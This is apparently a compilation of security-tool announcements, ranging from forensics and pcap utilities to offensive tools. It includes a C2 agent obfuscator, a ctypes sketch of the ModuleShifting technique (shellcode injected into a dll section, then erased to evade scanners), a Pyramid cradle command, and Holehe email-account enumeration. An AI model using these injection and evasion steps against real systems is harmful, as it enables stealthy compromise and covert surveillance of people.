Edit the obfuscator.py file and change the 'key' value to a 16-character key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py.

    You can run it like this:

    python3 obfuscator.py

    # and to run the agent, do as usual
    python3 obs_agent.py
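
For reference, the scheme described above (AES-ECB over the agent source, then base64) can be sketched in a few lines of Python. This is only an illustration of the idea using pycryptodome, not the actual obfuscator.py:

from base64 import b64encode
from Crypto.Cipher import AES        # pip install pycryptodome
from Crypto.Util.Padding import pad

KEY = b"0123456789abcdef"  # a 16-character key, like the 'key' value in obfuscator.py

def obfuscate(source: bytes) -> bytes:
    # pad to the AES block size, encrypt with ECB, then base64-encode
    cipher = AES.new(KEY, AES.MODE_ECB)
    return b64encode(cipher.encrypt(pad(source, AES.block_size)))

with open("agent.py", "rb") as agent_source:
    print(obfuscate(agent_source.read())[:64], b"...")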

Tips & Tricks

1. The built-in Flask app server can't handle multiple/concurrent requests, so you can use the gunicorn server for better performance like this:
    gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
2. Create a binary file for your Python agent like this:
    pip install pyinstaller
    pyinstaller --onefile agent.py

    The binary can be found under the dist directory.

In case something fails you may need to update your Python and pip libs. If it continues failing then... well... life happened.

3. Create new certs for each engagement.

4. Back up your c2.db, it is easy... just a file.

    Testing

    pytest was used for the testing. You can run the tests like this:

    cd tests/
    py.test

Be careful: You must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data.

    To check the code coverage and produce a nice html report you can use this:

    # pip3 install pytest-cov
    python -m pytest --cov=Commander --cov-report html

    Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



    JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

    By: Zion3R


    JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


    Prerequisites

    Before installing JSpector, you need to have Jython installed on Burp Suite.

    Installation

    1. Download the latest version of JSpector
    2. Open Burp Suite and navigate to the Extensions tab.
    3. Click the Add button in the Installed tab.
    4. In the Extension Details dialog box, select Python as the Extension Type.
    5. Click the Select file button and navigate to the JSpector.py.
    6. Click the Next button.
    7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

    Usage

• Just navigate through your targets and JSpector will start passively crawling JS files in the background and automatically return the results on the Dashboard tab.
    • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



    Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

    By: Zion3R



    Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

    Well, Spoofy is different and here is why:

1. Authoritative lookups for all queries, with a known fallback (Cloudflare DNS)
    2. Accurate bulk lookups
    3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
    4. SPF lookup counter


    HOW TO USE

    Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

    Usage:
    ./spoofy.py -d [DOMAIN] -o [stdout or xls]
    OR
    ./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

    Install Dependencies:
    pip3 install -r requirements.txt

HOW DO YOU KNOW IT'S SPOOFABLE

The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers. Download Here

    METHODOLOGY

    The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

    After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

    DISCLAIMER

    This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

    CREDIT

    Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

    DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

    Logo: cobracode

    Tool was inspired by Bishop Fox's project called spoofcheck.



    Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

    By: Zion3R

    Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

    This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.


    What is Dissect?

Dissect is an incident response framework built from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

    Singular approach

And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother with extracting files from your forensic container, mounting them (in case of VMDKs and such), retrieving the MFT, and parsing it with a separate tool to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

    If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!
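
For instance (the image path here is illustrative), querying a target and then exploring it interactively looks like:

$ target-query -f mft /evidence/disk.E01
$ target-shell /evidence/disk.E01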

    Create a lightweight container using Acquire

Dissect also provides you with a tool called acquire. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is also convenient is that you can deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on it! All without having to worry about file locks. These lightweight containers can then be analysed using tools like target-query and target-shell, but feel free to use other tools as well.

    A modular setup

    Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

    Try it out now!

    Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at https://try.dissect.tools to try Dissect in your browser.

    Don’t know where to start? Check out the introduction page.

    Want to get a detailed overview? Check out the overview page.

    Want to read everything? Check out the documentation.

    Projects

    Dissect currently consists of the following projects.

    Related

    These projects are closely related to Dissect, but not installed by this meta package.

    Requirements

    This project is part of the Dissect framework and requires Python.

    Information on the supported Python versions can be found in the Getting Started section of the documentation.

    Installation

    dissect is available on PyPI.

    pip install dissect

    Build and test instructions

    This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

    tox -e build

    The build artifacts can be found in the dist/ directory.

    tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:

    tox

    For a more elaborate explanation on how to build and test the project, please see the documentation.



    ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

    By: Zion3R


ModuleShifting is a stealthier variation of the Module Stomping and Module Overloading injection techniques. It is implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.

    The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.


ModuleShifting, when used with a shellcode payload, performs the following operations:

1. The legitimate hosting dll is loaded via LoadLibrary
2. Change the memory permissions of a specified section to RW
3. Overwrite the shellcode over the target section
4. Add optional padding to better blend into false positive behaviour (more information here)
5. Change permissions to RX
6. Execute the shellcode via a function pointer - additional execution methods: function callback or CreateThread API
7. Write the original dll content over the executed shellcode - this step avoids leaving a malicious memory artifact in the image memory space of the hosting dll. The shellcode needs to be functionally independent from further stages, otherwise execution will break.
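
To make the shellcode flow concrete, below is a minimal, illustrative ctypes sketch of the protect/overwrite/execute/restore pattern (steps 2-7). The hosting dll, section offset, and placeholder bytes are assumptions for demonstration; the real moduleshifting.py locates the target section by parsing the PE header:

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.LoadLibraryW.argtypes = [wintypes.LPCWSTR]
kernel32.LoadLibraryW.restype = wintypes.HMODULE
kernel32.VirtualProtect.argtypes = [wintypes.LPVOID, ctypes.c_size_t,
                                    wintypes.DWORD, wintypes.LPDWORD]

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20

base = kernel32.LoadLibraryW("dbghelp.dll")   # 1. load a legitimate hosting dll
section_rva = 0x1000                          # hypothetical section RVA (parse the PE header in practice)
payload = b"\xc3"                             # harmless placeholder ('ret'), not a real shellcode

addr = base + section_rva
old = wintypes.DWORD(0)
original = ctypes.string_at(addr, len(payload))  # keep a copy for the restore step

kernel32.VirtualProtect(addr, len(payload), PAGE_READWRITE, ctypes.byref(old))     # 2. RW
ctypes.memmove(addr, payload, len(payload))                                        # 3. overwrite
kernel32.VirtualProtect(addr, len(payload), PAGE_EXECUTE_READ, ctypes.byref(old))  # 5. RX (never RWX)
ctypes.CFUNCTYPE(None)(addr)()                                                     # 6. call via function pointer

kernel32.VirtualProtect(addr, len(payload), PAGE_READWRITE, ctypes.byref(old))
ctypes.memmove(addr, original, len(original))                                      # 7. restore original bytes
kernel32.VirtualProtect(addr, len(payload), PAGE_EXECUTE_READ, ctypes.byref(old))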

When using a PE payload, ModuleShifting performs the following operations:

1. The legitimate hosting dll is loaded via LoadLibrary
2. Change the memory permissions of a specified section to RW
3. Copy the PE over the specified target point section-by-section
4. Add optional padding to better blend into false positive behaviour
5. Perform base relocation
6. Resolve imports
7. Finalize sections by setting permissions to their native values (avoids the creation of an RWX memory region)
8. Execute TLS callbacks
9. Execute the PE entrypoint

    Why it's useful

ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and, compared to Module Stomping and Module Overloading, is stealthier because it decreases the amount of IoCs generated by the injection technique itself.

There are 3 main differences between Module Shifting and some public implementations of Module Stomping (such as the ones from Bobby Cooke and WithSecure):

    1. Padding: when writing shellcode or PE, you can use padding to better blend into common False Positive behaviour (such as third-party applications or .net dlls writing x amount of bytes over their .text section).
2. Shellcode execution using a function pointer. This helps avoid creating a new thread or calling unusual function callbacks.
3. Restoring the original dll content over the executed shellcode. This is a key difference.

    The differences between Module Shifting and Module Overloading are the following:

1. The PE can be written starting from a specified section instead of from the start of the hosting dll's PE. If the target section is chosen carefully, this can reduce the amount of IoCs generated (i.e. the PE header of the hosting dll is not overwritten, fewer bytes are overwritten on the .text section, etc.)
    2. Padding that can be added to the PE payload itself to better blend into false positives.

Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory, at the moment generating zero IoCs on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what enables more stealthiness in the injection is the shellcode's functional independence, so that the written malicious bytes can be restored to their original content, effectively erasing the traces of the injection.

    Disclaimer

    All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

    Credits

    This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.

    Usage

    ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.

    1. Clone the Pyramid repo:

    git clone https://github.com/naksyn/Pyramid

2. Generate a shellcode payload with your preferred C2 and drop it into Pyramid's Delivery_files folder. See the Caveats section for payload requirements.
3. Modify the parameters of the moduleshifting.py script inside Pyramid's Modules folder.
4. Start the Pyramid server: python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
5. Execute the generated cradle code in a Python interpreter.

    Caveats

    To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.

    A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.

    Detection opportunities

    Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.



    KaliPackergeManager - Kali Packerge Manager

    By: Zion3R


kalipm.sh is a powerful package management tool for Kali Linux that provides a user-friendly menu-based interface to simplify the installation of various packages and tools. It streamlines the process of managing software and enables users to effortlessly install packages from different categories.


    Features

    • Interactive Menu: Enjoy an intuitive and user-friendly menu-based interface for easy package selection.
    • Categorized Packages: Browse packages across multiple categories, including System, Desktop, Tools, Menu, and Others.
    • Efficient Installation: Automatically install selected packages with the help of the apt-get package manager.
    • System Updates: Keep your system up to date with the integrated update functionality.

    Installation

To install KaliPM, you can simply clone the repository from GitHub:

    git clone https://github.com/HalilDeniz/KaliPackergeManager.git

    Usage

    1. Clone the repository or download the KaliPM.sh script.
    2. Navigate to the directory where the script is located.
    3. Make the script executable by running the following command:
      chmod +x kalipm.sh
    4. Execute the script using the following command:
      ./kalipm.sh
    5. Follow the on-screen instructions to select a category and choose the desired packages for installation.

    Categories

    • System: Includes essential core items that are always included in the Kali Linux system.
    • Desktop: Offers various desktop environments and window managers to customize your Kali Linux experience.
    • Tools: Provides a wide range of specialized tools for tasks such as hardware hacking, cryptography, wireless protocols, and more.
    • Menu: Consists of packages tailored for information gathering, vulnerability assessments, web application attacks, and other specific purposes.
    • Others: Contains additional packages and resources that don't fall into the above categories.

    Update

    KaliPM.sh also includes an update feature to ensure your system is up to date. Simply select the "Update" option from the menu, and the script will run the necessary commands to clean, update, upgrade, and perform a full-upgrade on your system.
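
Under the hood this corresponds to the standard APT maintenance sequence, roughly as follows (illustrative; see kalipm.sh for the exact commands it runs):

sudo apt-get clean
sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get full-upgrade -y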

    Contributing

    Contributions are welcome! To contribute to KaliPackergeManager, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

If you have any questions, comments, or suggestions about KaliPackergeManager, please feel free to contact me:



    Associated-Threat-Analyzer - Detects Malicious IPv4 Addresses And Domain Names Associated With Your Web Application Using Local Malicious Domain And IPv4 Lists

    By: Zion3R


    Associated-Threat-Analyzer detects malicious IPv4 addresses and domain names associated with your web application using local malicious domain and IPv4 lists.


    Installation

    From Git

    git clone https://github.com/OsmanKandemir/associated-threat-analyzer.git
    cd associated-threat-analyzer && pip3 install -r requirements.txt
    python3 analyzer.py -d target-web.com

    From Dockerfile

You can run this application on a container after building the Dockerfile.

Warning: If you want to run a Docker container, it is recommended to use your own malicious IP and domain lists, because the maintainer may not update the default malicious IP and domain lists on the Docker image.
    docker build -t osmankandemir/threatanalyzer .
    docker run osmankandemir/threatanalyzer -d target-web.com

    From DockerHub

    docker pull osmankandemir/threatanalyzer
    docker run osmankandemir/threatanalyzer -d target-web.com

    Usage

    -d DOMAIN , --domain DOMAIN Input Target. --domain target-web1.com
    -t DOMAINSFILE, --DomainsFile Malicious Domains List to Compare. -t SampleMaliciousDomains.txt
    -i IPSFILE, --IPsFile Malicious IPs List to Compare. -i SampleMaliciousIPs.txt
    -o JSON, --json JSON JSON output. --json

    DONE

    • First-level depth scan your domain address.

    TODO list

• Third-level or deeper static-file scanning of the target web application.

See also this linked GitHub project, which finds related domains and IPv4 addresses for threat intelligence after Indicator-Intelligence v1.1.1 collects static files:

    https://github.com/OsmanKandemir/indicator-intelligence

    Default Malicious IPs and Domains Sources

    https://github.com/stamparm/blackbook

    https://github.com/stamparm/ipsum

    Development and Contribution

    See; CONTRIBUTING.md



    Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

    By: Zion3R


    A Pin Tool for tracing:


    Bypasses the anti-tracing check based on RDTSC.

    Generates a report in a .tag format (which can be loaded into other analysis tools):

    RVA;traced event

    i.e.

    345c2;section: .text
    58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
    3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
    3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
    3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
    398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
    3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
    49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
    4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
    ...

    How to build

    On Windows

    To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
    Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
    To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

    On Linux

For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer to tiny_runner.sh for more information. Detailed description available here.

    Usage

Details about the usage can be found on the project's Wiki.

    WARNINGS

    • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
• In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utility sometimes gets flagged as malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
• Since version 3.20, Pin has dropped support for old versions of Windows. If you need to use the tool on Windows < 8, try compiling it with Pin 3.19.


    Questions? Ideas? Join Discussions!



    Holehe - Tool To Check If The Mail Is Used On Different Sites Like Twitter, Instagram And Will Retrieve Information On Sites With The Forgotten Password Function

    By: Zion3R

    Holehe Online Version

    Summary

    Efficiently finding registered accounts from emails.

    Holehe checks if an email is attached to an account on sites like twitter, instagram, imgur and more than 120 others.


    Installation

    With PyPI

    pip3 install holehe

    With Github

    git clone https://github.com/megadose/holehe.git
    cd holehe/
    python3 setup.py install

    Quick Start

Holehe can be run from the CLI and rapidly embedded within existing Python applications.

CLI Example

    holehe test@gmail.com

Python Example

    import trio
    import httpx

    from holehe.modules.social_media.snapchat import snapchat


async def main():
    email = "test@gmail.com"
    out = []
    client = httpx.AsyncClient()

    await snapchat(email, client, out)

    print(out)
    await client.aclose()

trio.run(main)

    Module Output

For each module, data is returned in a standard dictionary with the following JSON-equivalent format:

{
  "name": "example",
  "rateLimit": false,
  "exists": true,
  "emailrecovery": "ex****e@gmail.com",
  "phoneNumber": "0*******78",
  "others": null
}

• rateLimit : Lets you know if you've been rate-limited.
    • exists : If an account exists for the email on that service.
    • emailrecovery : Sometimes partially obfuscated recovery emails are returned.
    • phoneNumber : Sometimes partially obfuscated recovery phone numbers are returned.
    • others : Any extra info.
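
Building on the Python example above, a small sketch of consuming that dictionary format (the helper name here is ours, not part of Holehe):

from typing import Any, Dict, List

def summarize(results: List[Dict[str, Any]]) -> None:
    # print a short verdict for each module result dict
    for result in results:
        if result["rateLimit"]:
            print(f"{result['name']}: rate-limited, result unreliable")
        elif result["exists"]:
            print(f"{result['name']}: account exists "
                  f"(recovery email: {result['emailrecovery']}, phone: {result['phoneNumber']})")
        else:
            print(f"{result['name']}: no account found")

# e.g. summarize(out) after running the snapchat example above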

    Rate limit? Change your IP.

    Maltego Transform : Holehe Maltego

    Thank you to :

    Donations

    For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ

License

    GNU General Public License v3.0

    Built for educational purposes only.

    Modules

    Name Domain Method Frequent Rate Limit
    aboutme about.me register ✘
    adobe adobe.com password recovery ✘
    amazon amazon.com login ✘
    amocrm amocrm.com register ✘
    anydo any.do login βœ”
    archive archive.org register ✘
    armurerieauxerre armurerie-auxerre.com register ✘
    atlassian atlassian.com register ✘
    axonaut axonaut.com register ✘
    babeshows babeshows.co.uk register ✘
    badeggsonline badeggsonline.com register ✘
    biosmods bios-mods.com register ✘
    biotechnologyforums biotechnologyforums.com register ✘
    bitmoji bitmoji.com login ✘
    blablacar blablacar.com register βœ”
    blackworldforum blackworldforum.com register βœ”
    blip blip.fm register βœ”
    blitzortung forum.blitzortung.org register ✘
    bluegrassrivals bluegrassrivals.com register ✘
    bodybuilding bodybuilding.com register ✘
    buymeacoffee buymeacoffee.com register βœ”
    cambridgemt discussion.cambridge-mt.com register ✘
    caringbridge caringbridge.org register ✘
    chinaphonearena chinaphonearena.com register ✘
    clashfarmer clashfarmer.com register βœ”
    codecademy codecademy.com register βœ”
    codeigniter forum.codeigniter.com register ✘
    codepen codepen.io register ✘
    coroflot coroflot.com register ✘
    cpaelites cpaelites.com register ✘
    cpahero cpahero.com register ✘
    cracked_to cracked.to register βœ”
    crevado crevado.com register βœ”
    deliveroo deliveroo.com register βœ”
    demonforums demonforums.net register βœ”
    devrant devrant.com register ✘
    diigo diigo.com register ✘
    discord discord.com register ✘
    docker docker.com register ✘
    dominosfr dominos.fr register βœ”
    ebay ebay.com login βœ”
    ello ello.co register ✘
    envato envato.com register ✘
    eventbrite eventbrite.com login ✘
    evernote evernote.com login ✘
    fanpop fanpop.com register ✘
    firefox firefox.com register ✘
    flickr flickr.com login ✘
    freelancer freelancer.com register ✘
    freiberg drachenhort.user.stunet.tu-freiberg.de register ✘
    garmin garmin.com register βœ”
    github github.com register ✘
    google google.com register βœ”
    gravatar gravatar.com other ✘
    hubspot hubspot.com login ✘
    imgur imgur.com register βœ”
    insightly insightly.com login ✘
    instagram instagram.com register βœ”
    issuu issuu.com register ✘
    koditv forum.kodi.tv register ✘
    komoot komoot.com register βœ”
    laposte laposte.fr register ✘
    lastfm last.fm register ✘
    lastpass lastpass.com register ✘
    mail_ru mail.ru password recovery ✘
    mybb community.mybb.com register ✘
    myspace myspace.com register ✘
    nattyornot nattyornotforum.nattyornot.com register ✘
    naturabuy naturabuy.fr register ✘
    ndemiccreations forum.ndemiccreations.com register ✘
    nextpvr forums.nextpvr.com register ✘
    nike nike.com register ✘
    nimble nimble.com register ✘
    nocrm nocrm.io register ✘
    nutshell nutshell.com register ✘
    odnoklassniki ok.ru password recovery ✘
    office365 office365.com other βœ”
    onlinesequencer onlinesequencer.net register ✘
    parler parler.com login ✘
    patreon patreon.com login βœ”
    pinterest pinterest.com register ✘
    pipedrive pipedrive.com register ✘
    plurk plurk.com register ✘
    pornhub pornhub.com register ✘
    protonmail protonmail.ch other ✘
    quora quora.com register ✘
    rambler rambler.ru register ✘
    redtube redtube.com register ✘
    replit replit.com register βœ”
    rocketreach rocketreach.co register ✘
    samsung samsung.com register ✘
    seoclerks seoclerks.com register ✘
    sevencups 7cups.com register βœ”
    smule smule.com register βœ”
    snapchat snapchat.com login ✘
    soundcloud soundcloud.com register ✘
    sporcle sporcle.com register ✘
    spotify spotify.com register βœ”
    strava strava.com register ✘
    taringa taringa.net register βœ”
    teamleader teamleader.com register ✘
    teamtreehouse teamtreehouse.com register ✘
    tellonym tellonym.me register ✘
    thecardboard thecardboard.org register ✘
    therianguide forums.therian-guide.com register ✘
    thevapingforum thevapingforum.com register ✘
    tumblr tumblr.com register ✘
    tunefind tunefind.com register βœ”
    twitter twitter.com register ✘
    venmo venmo.com register βœ”
    vivino vivino.com register ✘
    voxmedia voxmedia.com register ✘
    vrbo vrbo.com register ✘
    vsco vsco.co register ✘
    wattpad wattpad.com register βœ”
    wordpress wordpress login ✘
    xing xing.com register ✘
    xnxx xnxx.com register βœ”
    xvideos xvideos.com register ✘
    yahoo yahoo.com login βœ”
    zoho zoho.com login βœ”


    Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

    By: Zion3R


xsubfind3r is a command-line interface (CLI) utility to find a domain's known subdomains from curated passive online sources.


    Features

    • Fetches domains from curated passive sources to maximize results.

    • Supports stdin and stdout for easy integration into workflows.

    • Cross-Platform (Windows, Linux & macOS).

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner:

    curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

    ...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xsubfind3r.git 
    • Build the utility

       cd xsubfind3r/cmd/xsubfind3r && \
      go build .
    • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xsubfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work; URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, from which one will be used.

    Example config.yaml:

version: 0.3.0
sources:
  - alienvault
  - anubis
  - bevigil
  - chaos
  - commoncrawl
  - crtsh
  - fullhunt
  - github
  - hackertarget
  - intelx
  - shodan
  - urlscan
  - wayback
keys:
  bevigil:
    - awA5nvpKU3N8ygkZ
  chaos:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
  fullhunt:
    - 0d9652ce-516c-4315-b589-9b241ee6dc24
  github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
  intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
  shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
  urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xsubfind3r use the -h flag:

    xsubfind3r -h

    help message:


    _ __ _ _ _____
    __ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
    \ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
    > <\__ \ |_| | |_) | _| | | | | (_| |___) | |
    /_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

    USAGE:
    xsubfind3r [OPTIONS]

    INPUT:
    -d, --domain string[] target domains
    -l, --list string target domains' list file path

    SOURCES:
    --sources bool list supported sources
-u, --sources-to-use string[] comma(,) separated sources to use
-e, --sources-to-exclude string[] comma(,) separated sources to exclude

    OPTIMIZATION:
    -t, --threads int number of threads (default: 50)

    OUTPUT:
    --no-color bool disable colored output
    -o, --output string output subdomains' file path
    -O, --output-directory string output subdomains' directory path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)
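
Putting the flags together, typical invocations might look like this (the target domain and file names are illustrative):

# enumerate a single domain
xsubfind3r -d example.com

# enumerate domains from a list file and save the results
xsubfind3r -l domains.txt -o subdomains.txt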

    Contribution

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    Bryobio - NETWORK Pcap File Analysis

    By: Zion3R


Bryobio is a network pcap file analysis tool; it was developed to speed up the processes of SOC analysts during analysis.


    Tested

    OK Debian
    OK Ubuntu

    Requirements

    $ pip install pyshark
    $ pip install dpkt

    $ Wireshark
    $ Tshark
    $ Mergecap
    $ Ngrep

    π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦

$ git clone https://github.com/emrekybs/Bryobio.git
    $ cd Bryobio
    $ chmod +x bryobio.py

    $ python3 bryobio.py



    Redeye - A Tool Intended To Help You Manage Your Data During A Pentest Operation

    By: Zion3R


    This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.


    The Developers

    Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt

    Overview

